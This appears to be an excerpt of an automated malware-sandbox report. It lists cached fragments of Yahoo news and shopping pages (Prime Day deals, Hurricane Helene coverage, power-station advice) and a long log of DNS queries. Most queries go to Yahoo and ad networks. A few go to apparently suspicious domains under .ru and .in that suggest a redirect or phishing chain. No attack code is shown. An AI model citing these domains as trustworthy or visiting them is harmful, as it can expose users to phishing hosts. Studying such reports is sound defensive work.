(Yahoo)
Source: chromecache_1197.2.dr, chromecache_466.2.drString found in binary or memory: Amazon prices are rapidly dropping as well! October <a data-i13n=\"cpos:1;pos:1\" href=\"https://www.yahoo.com/topics/prime-day/\" data-ylk=\"slk:Prime Day;cpos:1;pos:1;elm:context_link;itc:0;sec:content-canvas\" class=\"link rapid-noclick-resp\">Prime Day</a> is officially<em>&nbsp;</em>slated for October 8 through October 9 (go mark your calendar!), but we're already seeing a bounty of deals equals www.yahoo.com (Yahoo)
Source: chromecache_1198.2.dr, chromecache_1077.2.drString found in binary or memory: Clinton said <a href=\"https://www.youtube.com/watch?v=4M3Itgp8G8s&amp;t=1552s\" rel=\"nofollow noopener\" target=\"_blank\" data-ylk=\"slk:during an interview;elm:context_link;itc:0;sec:content-canvas\" class=\"link rapid-noclick-resp\">during an interview</a> with equals www.youtube.com (Youtube)
Source: chromecache_1197.2.dr, chromecache_466.2.drString found in binary or memory: and this coverage will extend throughout all of Prime Big Deal Days, so check back often for updates.</p><h2 class=caas-jump-link-heading id=best-early-amazon-october-prime-day-tech-deals><strong>Best early Amazon October Prime Day tech deals</strong></h2><p>October Prime Day deals won't be live until, well, October! However, Amazon is already rolling out early markdowns as a lead-up to its second Prime Day of the year. Snap up these steals now.</p><p>If you have <a data-i13n=\"cpos:7;pos:1;elm:affiliate_link;elmt:premonetized\" href=\"https://shopping.yahoo.com/rdlw?merchantId=66ea567a-c987-4c2e-a2ff-02904efde6ea&amp;siteId=us-lifestyle&amp;pageId=1p-autolink&amp;featureId=text-link&amp;merchantName=Amazon&amp;custData=eyJzb3VyY2VOYW1lIjoiV2ViLURlc2t0b3AtVmVyaXpvbiIsImxhbmRpbmdVcmwiOiJodHRwczovL3d3dy5hbWF6b24uY29tL2FtYXpvbnByaW1lP3RhZz15bGUwMS1wLXYtNnNjLTIwIiwiY29udGVudFV1aWQiOiJhOWYzOGEzYS1lYWNmLTQ1OWItYWNkMC1jZjlhMjMyNDUxYjIifQ&amp;signature=AQAAAeUuYOiNsukE22WYW3mcm2RMed7Zz3HapSYFrRvUJ4MD&amp;gcReferrer=https%3A%2F%2Fwww.amazon.com%2Famazonprime&amp;uuid=MdVIoT2BIPFtfv0p23099\" rel=\"nofollow noopener\" target=\"_blank\" data-ylk=\"slk:Amazon Prime;cpos:7;pos:1;elm:affiliate_link;elmt:premonetized;itc:0;sec:content-canvas\" class=\"link rapid-noclick-resp rapid-with-clickid etailiffa-link\">Amazon Prime</a>, you equals www.yahoo.com (Yahoo)
Source: chromecache_1197.2.dr, chromecache_466.2.drString found in binary or memory: read on to see some of our fave items that are already on sale at Amazon.</p><h2 class=caas-jump-link-heading id=what-is-amazons-october-prime-day><strong>What </strong><strong><em>is </em></strong><strong>Amazon's October Prime Day?</strong></h2><p>Amazon Prime Day, launched in July 2015, is a massive site-wide savings event exclusive to Amazon Prime subscribers. The <a data-i13n=\"elm:affiliate_link;sellerN:Amazon;elmt:;cpos:2;pos:1\" href=\"https://shopping.yahoo.com/rdlw?merchantId=66ea567a-c987-4c2e-a2ff-02904efde6ea&amp;siteId=us-lifestyle&amp;pageId=1p-autolink&amp;featureId=text-link&amp;merchantName=Amazon&amp;custData=eyJzb3VyY2VOYW1lIjoiV2ViLURlc2t0b3AtVmVyaXpvbiIsImxhbmRpbmdVcmwiOiJodHRwczovL3d3dy5hbWF6b24uY29tL3ByaW1lYmlnZGVhbGRheXM_dGFnPXlsZTAxLTIwIiwiY29udGVudFV1aWQiOiI2YWY1NWQ0OC1jNzRjLTQyNTYtYjNjNy1kODNjMmYwOWFhY2IiLCJvcmlnaW5hbFVybCI6Imh0dHBzOi8vd3d3LmFtYXpvbi5jb20vcHJpbWViaWdkZWFsZGF5cyIsImR5bmFtaWNDZW50cmFsVHJhY2tpbmdJZCI6dHJ1ZSwic2l0ZUlkIjoidXMtbGlmZXN0eWxlIiwicGFnZUlkIjoiMXAtYXV0b2xpbmsiLCJmZWF0dXJlSWQiOiJ0ZXh0LWxpbmsifQ&amp;signature=AQAAAR-e5bI4Go3WiUwMft1MT8qm-WI8Lme59WHQqUGcSuYS&amp;gcReferrer=https%3A%2F%2Fwww.amazon.com%2Fprimebigdealdays\" class=\"link rapid-noclick-resp rapid-with-clickid etailiffa-link\" rel=\"nofollow noopener\" target=\"_blank\" data-ylk=\"slk:Amazon Prime Big Deal Days;elm:affiliate_link;sellerN:Amazon;elmt:;cpos:2;pos:1;itc:0;sec:content-canvas\">Amazon Prime Big Deal Days</a> addition came in 2022, when Amazon introduced the Prime Early Access Sale that October as a discount-heavy kickoff to holiday shopping. Last year, they officially changed the name to Prime Big Deal Days to complement the popular July Prime Day event.</p><p>If you're not yet a Prime member but still want to take advantage of Prime Big Deal Days, don't sweat it equals www.yahoo.com (Yahoo)
Source: chromecache_1198.2.dr, chromecache_1077.2.drString found in binary or memory: &nbsp;and later <a href=\"https://www.youtube.com/watch?v=rl0yBKwn25c\" rel=\"nofollow noopener\" target=\"_blank\" data-ylk=\"slk:by Henderson herself;elm:context_link;itc:0;sec:content-canvas\" class=\"link rapid-noclick-resp\">by Henderson herself</a>.</p><p>Noting that he talked to Henderson a lot about his love of music, Williams told <em>Us</em> about asking out his TV mom.</p><p><strong><em>Sign up for&nbsp;</em><a href=\"https://forms.dotdashmeredith.com/ew-tv-inline-offer\" rel=\"nofollow noopener\" target=\"_blank\" data-ylk=\"slk:Entertainment Weekly&#39;s;elm:context_link;itc:0;sec:content-canvas\" class=\"link rapid-noclick-resp\">Entertainment Weekly&#39;s</a><em><a href=\"https://forms.dotdashmeredith.com/ew-tv-inline-offer\" rel=\"nofollow noopener\" target=\"_blank\" data-ylk=\"slk:&nbsp;free daily newsletter;elm:context_link;itc:0;sec:content-canvas\" class=\"link rapid-noclick-resp\">&nbsp;free daily newsletter</a>&nbsp;to get breaking TV news, exclusive first looks, recaps, reviews, interviews with your favorite stars, and more.</em></strong></p><p> equals www.youtube.com (Youtube)
Source: chromecache_1198.2.drString found in binary or memory: </p><h3>President Biden to visit after promising help from Washington</h3><p>The President will visit impacted communities from the storm later this week, the White House said Sunday evening.</p><p>On Sunday, Biden spoke with Georgia Gov. Brian Kemp and North Carolina Gov. Roy Cooper as well as other officials across North Carolina, Tennessee, Florida and South Carolina.</p><p>He was briefed Sunday by Federal Emergency Management Agency Administrator Deanne Criswell and Homeland Security Adviser Liz Sherwood-Randall on recovery efforts from Hurricane Helene. <a href=\"https://www.facebook.com/FEMA/posts/pfbid0ToAeDgk3N92Gz7PMqPAChKcstSsiKVNce5WTMUgZBKJMxwMhJYFaq5uhhovDX7nBl\" rel=\"nofollow noopener\" target=\"_blank\" data-ylk=\"slk:Criswell visited Georgia;elm:context_link;itc:0;sec:content-canvas\" class=\"link rapid-noclick-resp\">Criswell visited Georgia</a> on Sunday and is set to go to North Carolina on Monday.</p><p>The White House said Biden monitored recovery efforts while in Rehoboth Beach, Delaware, this weekend, after approving pre-landfall emergency declarations for Florida, Georgia, North Carolina, and Alabama. He subsequently issued declarations for Tennessee and Virginia.</p><figure class=caas-figure><div class=caas-figure-with-pb style=\"max-height: 540px\"><div><div class=\"caas-img-container caas-img-lightbox caas-img-loader\" style=padding-bottom:56% data-lightbox-src=https://s.yimg.com/ny/api/res/1.2/MqadlSgH3Q.qChmj2XBAtw--/YXBwaWQ9aGlnaGxhbmRlcjt3PTE5MjA7aD0xMDgw/https://media.zenfs.com/en/cnn_articles_875/cd55c5c34909e84198fe2cf1768eacc1><span class=caas-img-wrapper><img class=\"caas-img caas-lazy has-preview\" alt=\"Heavy rains from hurricane Helene caused record flooding and damage on September 28 in Asheville, North Carolina. - Melissa Sue Gerrits/Getty Images\" data-src=https://s.yimg.com/ny/api/res/1.2/R0_NvQb2uE4TbqZHm1ozZA--/YXBwaWQ9aGlnaGxhbmRlcjt3PTk2MDtoPTU0MA--/https://media.zenfs.com/en/cnn_articles_875/cd55c5c34909e84198fe2cf1768eacc1><noscript><img alt=\"Heavy rains from hurricane Helene caused record flooding and damage on September 28 in Asheville, North Carolina. - Melissa Sue Gerrits/Getty Images\" src=https://s.yimg.com/ny/api/res/1.2/R0_NvQb2uE4TbqZHm1ozZA--/YXBwaWQ9aGlnaGxhbmRlcjt3PTk2MDtoPTU0MA--/https://media.zenfs.com/en/cnn_articles_875/cd55c5c34909e84198fe2cf1768eacc1 class=caas-img></noscript><button class=\"link rapid-noclick-resp caas-lightbox\" aria-label=\"View larger image\" data-ylk=sec:image-lightbox;slk:lightbox-open;elm:expand;itc:1><span class=\"openArrows icon\"><svg width=22 height=22 viewBox=\"0 0 22 22\"><path d=\"M12.372 0.92C12.372 0.414 12.782 0.004 13.287 0.004L21 0L20.996 7.712C20.996 8.217 20.586 8.628 20.08 8.628C19.574 8.628 19.164 8.217 19.164 7.712V3.183L12.337 10.011L10.988 8.663L17.816 1.835H13.287C12.782 1.835 12.372 1.425 12.372 0.92ZM1.835 17.816L8.663 10.988L10.012 12.337L3.183 19.164H7.712C8.218 19.164 8.627 19.574 8.627 20.08C8.627 20.586 8.218 20.995 7.712 20.995
Source: chromecache_1077.2.drString found in binary or memory: </p><h3>President Biden to visit after promising help from Washington</h3><p>The President will visit impacted communities from the storm later this week, the White House said Sunday evening.</p><p>On Sunday, Biden spoke with Georgia Gov. Brian Kemp and North Carolina Gov. Roy Cooper as well as other officials across North Carolina, Tennessee, Florida and South Carolina.</p><p>He was briefed Sunday by Federal Emergency Management Agency Administrator Deanne Criswell and Homeland Security Adviser Liz Sherwood-Randall on recovery efforts from Hurricane Helene. <a href=\"https://www.facebook.com/FEMA/posts/pfbid0ToAeDgk3N92Gz7PMqPAChKcstSsiKVNce5WTMUgZBKJMxwMhJYFaq5uhhovDX7nBl\" rel=\"nofollow noopener\" target=\"_blank\" data-ylk=\"slk:Criswell visited Georgia;elm:context_link;itc:0;sec:content-canvas\" class=\"link rapid-noclick-resp\">Criswell visited Georgia</a> on Sunday and is set to go to North Carolina on Monday.</p><p>The White House said Biden monitored recovery efforts while in Rehoboth Beach, Delaware, this weekend, after approving pre-landfall emergency declarations for Florida, Georgia, North Carolina, and Alabama. He subsequently issued declarations for Tennessee and Virginia.</p><figure class=caas-figure><div class=caas-figure-with-pb style=\"max-height: 540px\"><div><div class=\"caas-img-container caas-img-lightbox caas-img-loader\" style=padding-bottom:56% data-lightbox-src=https://s.yimg.com/ny/api/res/1.2/nAlYdkJf0leCx3QyOCMIIw--/YXBwaWQ9aGlnaGxhbmRlcjt3PTE5MjA7aD0xMDgwO2NmPXdlYnA-/https://media.zenfs.com/en/cnn_articles_875/cd55c5c34909e84198fe2cf1768eacc1><span class=caas-img-wrapper><img class=\"caas-img caas-lazy has-preview\" alt=\"Heavy rains from hurricane Helene caused record flooding and damage on September 28 in Asheville, North Carolina. - Melissa Sue Gerrits/Getty Images\" data-src=https://s.yimg.com/ny/api/res/1.2/vQxpdcpZqA1MYz7FI3ftgg--/YXBwaWQ9aGlnaGxhbmRlcjt3PTk2MDtoPTU0MDtjZj13ZWJw/https://media.zenfs.com/en/cnn_articles_875/cd55c5c34909e84198fe2cf1768eacc1><noscript><img alt=\"Heavy rains from hurricane Helene caused record flooding and damage on September 28 in Asheville, North Carolina. - Melissa Sue Gerrits/Getty Images\" src=https://s.yimg.com/ny/api/res/1.2/vQxpdcpZqA1MYz7FI3ftgg--/YXBwaWQ9aGlnaGxhbmRlcjt3PTk2MDtoPTU0MDtjZj13ZWJw/https://media.zenfs.com/en/cnn_articles_875/cd55c5c34909e84198fe2cf1768eacc1 class=caas-img></noscript><button class=\"link rapid-noclick-resp caas-lightbox\" aria-label=\"View larger image\" data-ylk=sec:image-lightbox;slk:lightbox-open;elm:expand;itc:1><span class=\"openArrows icon\"><svg width=22 height=22 viewBox=\"0 0 22 22\"><path d=\"M12.372 0.92C12.372 0.414 12.782 0.004 13.287 0.004L21 0L20.996 7.712C20.996 8.217 20.586 8.628 20.08 8.628C19.574 8.628 19.164 8.217 19.164 7.712V3.183L12.337 10.011L10.988 8.663L17.816 1.835H13.287C12.782 1.835 12.372 1.425 12.372 0.92ZM1.835 17.816L8.663 10.988L10.012 12.337L3.183 19.164H7.712C8.218 19.164 8.627 19.574 8.627 20.08C8.627 20.5
Source: chromecache_466.2.drString found in binary or memory: re planning on something like that to take up semi-permanent residence, it might behoove you to also purchase a smaller, lighter model that can move around. Also, look for wheels and a luggage-style telescoping handle, which makes relocating the big batteries much easier.</p><p><strong>Battery type:</strong> More power-station makers are switching to lithium iron phosphate (aka LiFePo4) batteries, which are known to be safer for home use than their lithium-ion counterparts. They also charge faster and have much longer lifespans, by most estimates anywhere from 3 to 5 times longer. That means a better return on your investment, even if you pay a little more up front.</p><figure class=caas-figure><div><div><div class=\"caas-img-container caas-img-lightbox caas-img-loader noheight\" data-lightbox-src=https://s.yimg.com/ny/api/res/1.2/5IdkClLBkEf3foV9JvLRgQ--/YXBwaWQ9aGlnaGxhbmRlcjt3PTI0MDA7Y2Y9d2VicA--/https://s.yimg.com/os/creatr-uploaded-images/2023-09/78543620-5d6c-11ee-a3fc-0dc8070025a4><a class=\"link rapid-noclick-resp\" href=https://shopping.yahoo.com/rdlw?merchantId=66ea567a-c987-4c2e-a2ff-02904efde6ea&siteId=us-lifestyle&pageId=1p-autolink&featureId=text-link&merchantName=Amazon&custData=eyJzb3VyY2VOYW1lIjoiV2ViLURlc2t0b3AtVmVyaXpvbiIsImxhbmRpbmdVcmwiOiJodHRwczovL3d3dy5hbWF6b24uY29tL0RFRU5PLVBvcnRhYmxlLUdlbmVyYXRvci1PcHRpb25hbC1FbWVyZ2VuY3kvZHAvQjBDREJXVFo3Sy8_dGFnPXlsZTAxLXAtdi00aGQtMjAiLCJjb250ZW50VXVpZCI6Ijk2Y2Y3MGFjLTg3ZmItNDdlZi1iZTFjLTI1NWJmNDdiMDBjMiJ9&signature=AQAAAfqWwBO5bNmex9RJBkiXqnkFdtGWoQub9Ho1zIePPj7i&gcReferrer=https%3A%2F%2Fwww.amazon.com%2FDEENO-Portable-Generator-Optional-Emergency%2Fdp%2FB0CDBWTZ7K%2F data-ylk><img class=\"caas-img caas-lazy\" alt=\"The Deeno GT power station.\" data-src=https://s.yimg.com/ny/api/res/1.2/3K5axd7IcBYR8yQz56jVlw--/YXBwaWQ9aGlnaGxhbmRlcjt3PTk2MDtjZj13ZWJw/https://s.yimg.com/os/creatr-uploaded-images/2023-09/78543620-5d6c-11ee-a3fc-0dc8070025a4><noscript><img alt=\"The Deeno GT power station.\" src=https://s.yimg.com/ny/api/res/1.2/3K5axd7IcBYR8yQz56jVlw--/YXBwaWQ9aGlnaGxhbmRlcjt3PTk2MDtjZj13ZWJw/https://s.yimg.com/os/creatr-uploaded-images/2023-09/78543620-5d6c-11ee-a3fc-0dc8070025a4 class=caas-img></noscript></a></div></div></div><div class=\"caption-wrapper caption-aligned-with-image\"><figcaption class=caption-collapse>The Deeno GT power station has front-facing ports and an informative display -- but no companion app. (Rick Broida/Yahoo News)</figcaption></div></figure><p><strong>Total output power:</strong> Different devices and appliances consume different amounts of power. A mini-fridge, for example, might use around 45 watts, while a full-size one might need more like 500. A simple space heater: 1,500 watts. A laptop: 90 watts. A CPAP machine: 30 to 60 watts. Consider numbers like those when evaluating a power station equals www.yahoo.com (Yahoo)
Source: chromecache_1197.2.drString found in binary or memory: re planning on something like that to take up semi-permanent residence, it might behoove you to also purchase a smaller, lighter model that can move around. Also, look for wheels and a luggage-style telescoping handle, which makes relocating the big batteries much easier.</p><p><strong>Battery type:</strong> More power-station makers are switching to lithium iron phosphate (aka LiFePo4) batteries, which are known to be safer for home use than their lithium-ion counterparts. They also charge faster and have much longer lifespans, by most estimates anywhere from 3 to 5 times longer. That means a better return on your investment, even if you pay a little more up front.</p><figure class=caas-figure><div><div><div class=\"caas-img-container caas-img-lightbox caas-img-loader noheight\" data-lightbox-src=https://s.yimg.com/ny/api/res/1.2/x7j1KEG2_xreSz_oNk9wOw--/YXBwaWQ9aGlnaGxhbmRlcjt3PTI0MDA-/https://s.yimg.com/os/creatr-uploaded-images/2023-09/78543620-5d6c-11ee-a3fc-0dc8070025a4><a class=\"link rapid-noclick-resp\" href=https://shopping.yahoo.com/rdlw?merchantId=66ea567a-c987-4c2e-a2ff-02904efde6ea&siteId=us-lifestyle&pageId=1p-autolink&featureId=text-link&merchantName=Amazon&custData=eyJzb3VyY2VOYW1lIjoiV2ViLURlc2t0b3AtVmVyaXpvbiIsImxhbmRpbmdVcmwiOiJodHRwczovL3d3dy5hbWF6b24uY29tL0RFRU5PLVBvcnRhYmxlLUdlbmVyYXRvci1PcHRpb25hbC1FbWVyZ2VuY3kvZHAvQjBDREJXVFo3Sy8_dGFnPXlsZTAxLXAtdi00aGQtMjAiLCJjb250ZW50VXVpZCI6Ijk2Y2Y3MGFjLTg3ZmItNDdlZi1iZTFjLTI1NWJmNDdiMDBjMiJ9&signature=AQAAAfqWwBO5bNmex9RJBkiXqnkFdtGWoQub9Ho1zIePPj7i&gcReferrer=https%3A%2F%2Fwww.amazon.com%2FDEENO-Portable-Generator-Optional-Emergency%2Fdp%2FB0CDBWTZ7K%2F data-ylk><img class=\"caas-img caas-lazy\" alt=\"The Deeno GT power station.\" data-src=https://s.yimg.com/ny/api/res/1.2/.HD6Dtp3yH7ju7cmF7owNw--/YXBwaWQ9aGlnaGxhbmRlcjt3PTk2MA--/https://s.yimg.com/os/creatr-uploaded-images/2023-09/78543620-5d6c-11ee-a3fc-0dc8070025a4><noscript><img alt=\"The Deeno GT power station.\" src=https://s.yimg.com/ny/api/res/1.2/.HD6Dtp3yH7ju7cmF7owNw--/YXBwaWQ9aGlnaGxhbmRlcjt3PTk2MA--/https://s.yimg.com/os/creatr-uploaded-images/2023-09/78543620-5d6c-11ee-a3fc-0dc8070025a4 class=caas-img></noscript></a></div></div></div><div class=\"caption-wrapper caption-aligned-with-image\"><figcaption class=caption-collapse>The Deeno GT power station has front-facing ports and an informative display -- but no companion app. (Rick Broida/Yahoo News)</figcaption></div></figure><p><strong>Total output power:</strong> Different devices and appliances consume different amounts of power. A mini-fridge, for example, might use around 45 watts, while a full-size one might need more like 500. A simple space heater: 1,500 watts. A laptop: 90 watts. A CPAP machine: 30 to 60 watts. Consider numbers like those when evaluating a power station equals www.yahoo.com (Yahoo)
Source: chromecache_1197.2.dr, chromecache_466.2.drString found in binary or memory: re signed up for <a data-i13n=\"elm:affiliate_link;sellerN:Walmart;elmt:;cpos:8;pos:1\" href=\"https://shopping.yahoo.com/rdlw?merchantId=3719d8d4-5edd-4817-998a-91f3229e7323&amp;siteId=us-lifestyle&amp;pageId=1p-autolink&amp;featureId=text-link&amp;merchantName=Walmart&amp;custData=eyJzb3VyY2VOYW1lIjoiV2ViLURlc2t0b3AtVmVyaXpvbiIsImxhbmRpbmdVcmwiOiJodHRwczovL3d3dy53YWxtYXJ0LmNvbS9wbHVzPyIsImNvbnRlbnRVdWlkIjoiNTgwNTI2NmQtMDM5Mi00ZmM1LTk5ZTMtYjNiN2U5ZGNiOGUxIiwib3JpZ2luYWxVcmwiOiJodHRwczovL3d3dy53YWxtYXJ0LmNvbS9wbHVzPyJ9&amp;signature=AQAAAW1I1695zHpLVCAegY-ycySRFsXPH1PBh3SWBoErB-WL&amp;gcReferrer=https%3A%2F%2Fwww.walmart.com%2Fplus%3F\" class=\"link rapid-noclick-resp rapid-with-clickid etailiffa-link\" rel=\"nofollow noopener\" target=\"_blank\" data-ylk=\"slk:Walmart+;elm:affiliate_link;sellerN:Walmart;elmt:;cpos:8;pos:1;itc:0;sec:content-canvas\">Walmart+</a>. It equals www.yahoo.com (Yahoo)
Source: chromecache_1077.2.drString found in binary or memory: s clip played any role in the investigation.</p><div class=\"caas-sports-module caas-curated-links\"><div class=wafer-fetch data-wf-body='{\"m_id\":\"news\",\"ctrl\":\"CuratedLinks\",\"m_mode\":\"json\",\"config\":{\"isSmartphone\":false,\"requestId\":\"1pa4ckpjflnfm\",\"site\":\"frontpage\",\"xhrPathPrefix\":\"/sports_content_ms/_rcv/remote\",\"uuid\":\"cc162679-b996-3b22-bf08-a33e637cd3e7\",\"mpos\":6}}' data-wf-credentials=include data-wf-replace=1 data-wf-trigger=viewport data-wf-session-retry-count=2 data-wf-timeout=5000 data-wf-trigger-offset=\"600 0\" data-wf-url=https://sports.yahoo.com/sports_content_ms/_rcv/remote?m_id=news&ctrl=CuratedLinks&m_mode=json&&listId=a1db4da0-8ebc-11e8-9fff-e24388c7ae1b&uuid=cc162679-b996-3b22-bf08-a33e637cd3e7&header=Entertainment%20News&subheader=Music%2C%20TV%2C%20movies%20and%20more&mpos=6&headerLink=https://www.yahoo.com/news/entertainment&site=frontpage&xhrPathPrefix=/sports_content_ms/_rcv/remote><div class=caas-card-loader></div></div></div><p> equals www.yahoo.com (Yahoo)
Source: chromecache_1197.2.dr, chromecache_466.2.drString found in binary or memory: s easy to <a data-i13n=\"elm:affiliate_link;sellerN:Walmart;elmt:;cpos:9;pos:1\" href=\"https://shopping.yahoo.com/rdlw?merchantId=3719d8d4-5edd-4817-998a-91f3229e7323&amp;siteId=us-lifestyle&amp;pageId=1p-autolink&amp;featureId=text-link&amp;merchantName=Walmart&amp;custData=eyJzb3VyY2VOYW1lIjoiV2ViLURlc2t0b3AtVmVyaXpvbiIsImxhbmRpbmdVcmwiOiJodHRwczovL3d3dy53YWxtYXJ0LmNvbS9wbHVzPyIsImNvbnRlbnRVdWlkIjoiNTgwNTI2NmQtMDM5Mi00ZmM1LTk5ZTMtYjNiN2U5ZGNiOGUxIiwib3JpZ2luYWxVcmwiOiJodHRwczovL3d3dy53YWxtYXJ0LmNvbS9wbHVzPyJ9&amp;signature=AQAAAW1I1695zHpLVCAegY-ycySRFsXPH1PBh3SWBoErB-WL&amp;gcReferrer=https%3A%2F%2Fwww.walmart.com%2Fplus%3F\" class=\"link rapid-noclick-resp rapid-with-clickid etailiffa-link\" rel=\"nofollow noopener\" target=\"_blank\" data-ylk=\"slk:sign up for your free 30-day trial here;elm:affiliate_link;sellerN:Walmart;elmt:;cpos:9;pos:1;itc:0;sec:content-canvas\">sign up for your free 30-day trial here</a>. You equals www.yahoo.com (Yahoo)
Source: chromecache_466.2.drString found in binary or memory: {"items":[{"data":{"partnerData":{"adMeta":{"hashtag":"news;nordstrom;shopping;shopping","isSupplySegment":"false","lang":"en-US","region":"US","rs":"lmsid:a0V0W00000JIbmMUAT;revsp:yahoo_life_shopping_281;lpstaid:60ff7c91-851e-44a7-8400-9dddc9a53744;pt:content;pd:modal;ver:megastrm;pct:story","site_attribute":"wiki_topics=\"Nordstrom;Gilmore_Girls;Charlotte_Tilbury\" ctopid=\"1878000;10610489\" hashtag=\"news;nordstrom;shopping;1878000;10610489\" rs=\"lmsid:a0V0W00000JIbmMUAT;revsp:yahoo_life_shopping_281;lpstaid:60ff7c91-851e-44a7-8400-9dddc9a53744;pt:content;pd:modal;ver:megastrm;lu:0;pct:story\"","spaceid":"1197792446","site":"lifestyle","enabled":true,"pos":"","showBodyAds":false,"showPhotoAds":false},"alias":"ymedia-alias:shadow=i-scrolled-through-18000-nordstrom-new-fall-arrivals--here-are-my-25-favorites-210216826","canonicalSite":"lifestyle","canonicalUrl":"https://www.yahoo.com/lifestyle/i-scrolled-through-18000-nordstrom-new-fall-arrivals--here-are-my-25-favorites-210216826.html","categoryLabel":"Style","commentsAllowed":true,"commentsCount":0,"commerceArticleType":"discovery","contentMeta":{"adPostions":{"photos":{}},"bodySlots":{"commerceQuickOverviewSlot":{"id":"caas-commerce-quick-overview","insertIndex":1}},"cover":null,"embeds":null,"hasEmbedAtBeginning":false,"hasEmbedAtEnd":false,"hasYahooVideo":false,"isLongArticle":false,"potentialSlots":0,"outstreamAdPosition":-1,"readMorePosition":-1,"totalParagraphs":0,"contentI13n":{}},"contentType":"story","editorialPicksList":"6200f7cd-485c-44a6-9643-0097fb5f80c9","entities":[{"term":"WIKIID:Nordstrom","label":"Nordstrom","capAbtScore":"0.969","metaData":[{"visible":"false"}],"startchar":862,"endchar":870,"specialParentTags":["a","title"],"instanceParentTags":["a"]},{"term":"","label":"fall fashion","capAbtScore":"0.921","metaData":[{"visible":"false"}],"startchar":1205,"endchar":1216,"specialParentTags":["a"],"instanceParentTags":["a"]},{"term":"","label":"fall trends","capAbtScore":"0.897","metaData":[{"visible":"false"}],"startchar":595,"endchar":605,"specialParentTags":[],"instanceParentTags":[]},{"term":"","label":"fall shoes","capAbtScore":"0.853","metaData":[{"visible":"false"}],"startchar":1223,"endchar":1232,"specialParentTags":[],"instanceParentTags":[]},{"term":"","label":"fall home decor","capAbtScore":"0.843","metaData":[{"visible":"false"}],"startchar":1252,"endchar":1266,"specialParentTags":[],"instanceParentTags":[]},{"term":"WIKIID:Gilmore_Girls","label":"Gilmore Girls","capAbtScore":"0.753","metaData":[{"visible":"false"}],"startchar":658,"endchar":670,"specialParentTags":[],"instanceParentTags":[]},{"term":"YCT:001000616","score":"0.7","label":"Shopping"},{"term":"YMEDIA:CATEGORY=100000002","score":"1.0","label":""},{"term":"YMEDIA:CATEGORY=100000009","score":"1.0","label":""}],"factualPollId":null,"finalUrl":"https://www.yahoo.com/lifestyle/i-scrolled-through-18000-nordstrom-new-fall-arrivals--here-are-my-25-favorites-210216826.html","hasScribble":false,"hasSlickVideo
Source: global trafficDNS traffic detected: DNS query: lipsoftinc.in
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: href.li
Source: global trafficDNS traffic detected: DNS query: hfj.rontishet.ru
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: ht4hkoldfwqkuse7qoti8nr4vfbfcgkyagnd3phsgq5swccnhjjxv.hocklahro.ru
Source: global trafficDNS traffic detected: DNS query: yahoo.com
Source: global trafficDNS traffic detected: DNS query: www.yahoo.com
Source: global trafficDNS traffic detected: DNS query: geo.yahoo.com
Source: global trafficDNS traffic detected: DNS query: geo.query.yahoo.com
Source: global trafficDNS traffic detected: DNS query: s.yimg.com
Source: global trafficDNS traffic detected: DNS query: search.yahoo.com
Source: global trafficDNS traffic detected: DNS query: consent.cmp.oath.com
Source: global trafficDNS traffic detected: DNS query: edge-mcdn.secure.yahoo.com
Source: global trafficDNS traffic detected: DNS query: guce.yahoo.com
Source: global trafficDNS traffic detected: DNS query: udc.yahoo.com
Source: global trafficDNS traffic detected: DNS query: noa.yahoo.com
Source: global trafficDNS traffic detected: DNS query: securepubads.g.doubleclick.net
Source: global trafficDNS traffic detected: DNS query: cdn.taboola.com
Source: global trafficDNS traffic detected: DNS query: opus.analytics.yahoo.com
Source: global trafficDNS traffic detected: DNS query: ups.analytics.yahoo.com
Source: global trafficDNS traffic detected: DNS query: gps-aa.ybp.yahoo.com
Source: global trafficDNS traffic detected: DNS query: pa.ybp.yahoo.com
Source: global trafficDNS traffic detected: DNS query: trc.taboola.com
Source: global trafficDNS traffic detected: DNS query: beacon.taboola.com
Source: global trafficDNS traffic detected: DNS query: api.taboola.com
Source: global trafficDNS traffic detected: DNS query: pm-widget.taboola.com
Source: global trafficDNS traffic detected: DNS query: gum.criteo.com
Source: global trafficDNS traffic detected: DNS query: tsdtocl.com
Source: global trafficDNS traffic detected: DNS query: tags.bluekai.com
Source: global trafficDNS traffic detected: DNS query: dpm.demdex.net
Source: global trafficDNS traffic detected: DNS query: aa.agkn.com
Source: global trafficDNS traffic detected: DNS query: uipglob.semasio.net
Source: global trafficDNS traffic detected: DNS query: cms.analytics.yahoo.com
Source: global trafficDNS traffic detected: DNS query: images.taboola.com
Source: global trafficDNS traffic detected: DNS query: uipus.semasio.net
Source: global trafficDNS traffic detected: DNS query: pips.taboola.com
Source: global trafficDNS traffic detected: DNS query: cds.taboola.com
Source: global trafficDNS traffic detected: DNS query: i.clean.gg
Source: global trafficDNS traffic detected: DNS query: pbs.yahoo.com
Source: global trafficDNS traffic detected: DNS query: idx.liadm.com
Source: global trafficDNS traffic detected: DNS query: c2shb-oao.ssp.yahoo.com
Source: global trafficDNS traffic detected: DNS query: fastlane.rubiconproject.com
Source: global trafficDNS traffic detected: DNS query: display.bidder.taboola.com
Source: global trafficDNS traffic detected: DNS query: htlb.casalemedia.com
Source: global trafficDNS traffic detected: DNS query: bidder.criteo.com
Source: global trafficDNS traffic detected: DNS query: rtb.openx.net
Source: global trafficDNS traffic detected: DNS query: hbopenbid.pubmatic.com
Source: global trafficDNS traffic detected: DNS query: prebid.media.net
Source: global trafficDNS traffic detected: DNS query: tlx.3lift.com
Source: global trafficDNS traffic detected: DNS query: ads.yieldmo.com
Source: global trafficDNS traffic detected: DNS query: rp.liadm.com
Source: global trafficDNS traffic detected: DNS query: beacon.bidder.taboola.com
Source: global trafficDNS traffic detected: DNS query: pbd.yahoo.com
Source: global trafficDNS traffic detected: DNS query: finance.yahoo.com
Source: global trafficDNS traffic detected: DNS query: s.aolcdn.com
Source: global trafficDNS traffic detected: DNS query: ssum-sec.casalemedia.com
Source: global trafficDNS traffic detected: DNS query: ads.pubmatic.com
Source: global trafficDNS traffic detected: DNS query: u.openx.net
Source: global trafficDNS traffic detected: DNS query: eus.rubiconproject.com
Source: global trafficDNS traffic detected: DNS query: eb2.3lift.com
Source: global trafficDNS traffic detected: DNS query: js-sec.indexww.com
Source: global trafficDNS traffic detected: DNS query: ads.rubiconproject.com
Source: global trafficDNS traffic detected: DNS query: sb.scorecardresearch.com
Source: global trafficDNS traffic detected: DNS query: cdn.jsdelivr.net
